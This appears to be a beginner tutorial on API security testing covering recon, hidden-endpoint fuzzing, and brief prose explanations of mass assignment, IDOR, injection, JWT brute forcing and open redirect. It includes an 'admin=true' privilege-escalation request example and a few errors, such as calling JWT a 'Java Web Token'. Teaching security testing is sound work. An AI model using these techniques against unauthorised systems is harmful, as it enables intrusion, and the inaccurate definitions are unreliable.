API Testing

Introduction to API

API stands for Application Programming Interface that acts as middle man whose job is deliver the data with the client and server for data exchange.

Basically it acts as a medium of communication between two entities.

Types of API

1. REST API
2. SOAP API

Properties of secure API

1. An API should provide expected output for a given input.
2. The inputs should appear within a particular range and values crossing the range must be rejected.
3. Any empty or null input must be rejected when it is unacceptable.
4. Incorrectly sized input must be rejected.

API vulnerabilities

Some examples of API vulnerabilities are:

1. Mass Assignment
2. JWT web token brute forcing
3. JSON hijacking
4. Command Injection
5. Open Redirect
6. SQL injection
7. Hidden API Fuzzing
8. IDOR

Tools that can be used for API testing:

1. Postman
2. Burpsuite

API Recon

Read API documentation thoroughly as it not only helps in understanding the API, it will also help you to understand for what type of request the response will be and it also helps you to save your time and effort during testing.

Step 1: Decide your target

Step 2: Start finding subdomains

Step 3: Use programmable web

Step 4: By using burpsuite manually

Finding hidden APIs

Lets say, you have an API as:

aayushforinfosec.wordpress.com/api/v1

So our target is /api/v1. Now we have to do fuzzing on this to test for any security vulnerabilities.

Fuzzing is just like brute forcing using a wordlist that can be done by using burpsuite.

Try to create your own wordlist that are related to target. It also helps in hidden API enumeration.

Mass Assignment

This type of vulnerability occurs when you add extra perimeters in your request or alter the request in such a way that can give you some extra benefit.

For example: You are registering on a website as a normal user by adding your username and password and you intercept this request with parameters.

username=demo&password=infosec

Now you add an extra parameter that might help you to gain admin privileges.

username=demo&password=infosec&admin=true

After submitting the above altered request you can register yourself as an admin.

IDOR(Insecure Direct Object Reference)

IDOR is access control based bug which receives parameter from application user and but gives response for different parameter.

For example: Suppose our query is “abcd.com/user=1” where we are querying data for user 1 but in case of that we are receiving response for another user, let’s say 2.

SQL Injection

It is the type of vulnerability that accepts user data blindly and if the data is somehow related to the language of database it gets executed and may give undesired output for victim.

Command Injection

In this case the attacker send data that is related to the server commands in order to check if the commands are executing and will try to exploit it.

JWT web token brute forcing

So whenever you login into a website it will provide an authorization token maybe in the form of JWT(Java Web Token). You can try to make your own token by brute forcing at a particular character-set in order to break in the authentication.

To understand any JWT token use jwt.io.

Open-Redirect

In this type of vulnerability the attacker tries to add a payload(generally a web location) in order to redirect the API request to his/her defined payload.

For ex: If someone embed google.com at the end of the API the api request might redirect victim to the google page.

Checklist for API Testing

1. Fuzz Testing
   • Arithmetic Operations
   • Command Injection
   • Brute Forcing using wordlist for hidden API
   • Sensitive data exposure
2. Command Injection
   • Injection of commands that work on server.
   • Blind Injections
   • SQL Injections
3. Changing HTTP methods
4. Authentication Testing